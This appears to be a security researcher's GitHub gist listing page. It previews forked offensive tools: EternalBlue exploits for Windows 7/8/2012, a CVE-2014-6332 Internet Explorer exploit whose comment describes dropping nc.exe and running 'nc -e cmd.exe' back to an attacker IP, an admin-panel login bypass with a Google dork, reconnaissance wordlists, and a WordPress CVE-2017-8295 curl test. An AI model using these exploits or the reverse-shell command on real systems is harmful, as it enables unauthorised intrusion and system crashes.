Halim J. hxlxmj

I specialize in offensive security, identifying critical vulnerabilities to secure systems. Recognized in global bug bounty programs, I stay ahead of threats.

49 followers · 174 following

wezoomagency
Montréal
wezoom.ca
in/hxlxmj
https://wezoom.ca

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

hxlxmj / eternalblue8_exploit.py

Created August 5, 2022 01:44 — forked from worawit/eternalblue8_exploit.py

Eternalblue exploit for Windows 8/2012

	#!/usr/bin/python
	# This file has no update anymore. Please see https://github.com/worawit/MS17-010
	from impacket import smb, ntlm
	from struct import pack
	import sys
	import socket

	'''
	EternalBlue exploit for Windows 8 and 2012 by sleepya
	The exploit might FAIL and CRASH a target system (depended on what is overwritten)

hxlxmj / eternalblue7_exploit.py

Created August 5, 2022 01:44 — forked from worawit/eternalblue7_exploit.py

Eternalblue exploit for Windows 7/2008

	#!/usr/bin/python
	# This file has no update anymore. Please see https://github.com/worawit/MS17-010
	from impacket import smb
	from struct import pack
	import sys
	import socket

	'''
	EternalBlue exploit for Windows 7/2008 by sleepya
	The exploit might FAIL and CRASH a target system (depended on what is overwritten)

hxlxmj / cve-2014-6332_exploit.html

Created August 5, 2022 01:44 — forked from worawit/cve-2014-6332_exploit.html

CVE-2014-6332 IE exploit to get shell (packed everything in one html)

	<html>
	<head>
	<!--
	CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
	The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
	'server_ip' and 'server_port' in javascript below determined the connect back target

	Tested on
	- IE11 + Windows 7 64-bit (EPM is off)
	- IE11 + Windoes 8.1 64-bit (EPM is off)

hxlxmj / file_magic_numbers.md

Created July 25, 2022 06:50 — forked from leommoore/file_magic_numbers.md

File Magic Numbers

Magic numbers are the first bits of a file which uniquely identify the type of file. This makes programming easier because complicated file structures need not be searched in order to identify the file type.

For example, a jpeg file starts with ffd8 ffe0 0010 4a46 4946 0001 0101 0047 ......JFIF.....G ffd8 shows that it's a JPEG file, and ffe0 identify a JFIF type structure. There is an ascii encoding of "JFIF" which comes after a length code, but that is not necessary in order to identify the file. The first 4 bytes do that uniquely.

This gives an ongoing list of file-type magic numbers.

Image Files

hxlxmj / Exploits

Created July 25, 2022 04:33 — forked from dreadpiratesr/Exploits

	Exploit Title: Supercon Direct login to admin panel without entering password
	Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
	Product Description
	——————-
	Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
	We provide world-class technology services by constantly exploring and implementing innovative
	solutions that drive long-term value to our customers. We have been providing solutions to clients
	across the globe for more than 5 years and boast of our extensive
	experience on website designing and development projects.

hxlxmj / content_discovery_all.txt

Created July 22, 2022 01:04 — forked from jhaddix/content_discovery_all.txt

a masterlist of content discovery URLs and files (used most commonly with gobuster)

This file has been truncated, but you can view the full file.

	`
	~/
	~
	×™×


	___
	__
	_

hxlxmj / all.txt

Created July 22, 2022 01:02 — forked from jhaddix/all.txt

all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/

This file has been truncated, but you can view the full file.


	.
	..
	........
	@
	*
	.
	..*
	ðŸŽ

hxlxmj / content_discovery_nullenc0de.txt

Created July 22, 2022 01:02 — forked from nullenc0de/content_discovery_nullenc0de.txt

content_discovery_nullenc0de.txt

This file has been truncated, but you can view the full file.

	/
	$$$lang-translate.service.js.aspx
	$367-Million-Merger-Blocked.html
	$defaultnav
	${idfwbonavigation}.xml
	$_news.php
	$search2
	£º
	.0
	/0

hxlxmj / params.txt

Created July 22, 2022 00:59 — forked from nullenc0de/params.txt

List of parameters for content discovery

	0
	1
	11
	12
	13
	14
	15
	16
	17
	2

hxlxmj / test-WP-CVE-2017-8295.sh

Created June 29, 2022 21:37 — forked from gustavoapolinario/test-WP-CVE-2017-8295.sh

	# It's Work to you test if the vulnerability is working
	# use only to test your system
	# use with responsability
	#
	# use method:
	# test-WP-CVE-2017-8295.sh [YOUR-SITE-TO-TEST] [USER-TO-TEST]
	# ex: test-WP-CVE-2017-8295.sh example.com user


	curl --write-out %{http_code} --silent --output ~/body.txt \

Newer Older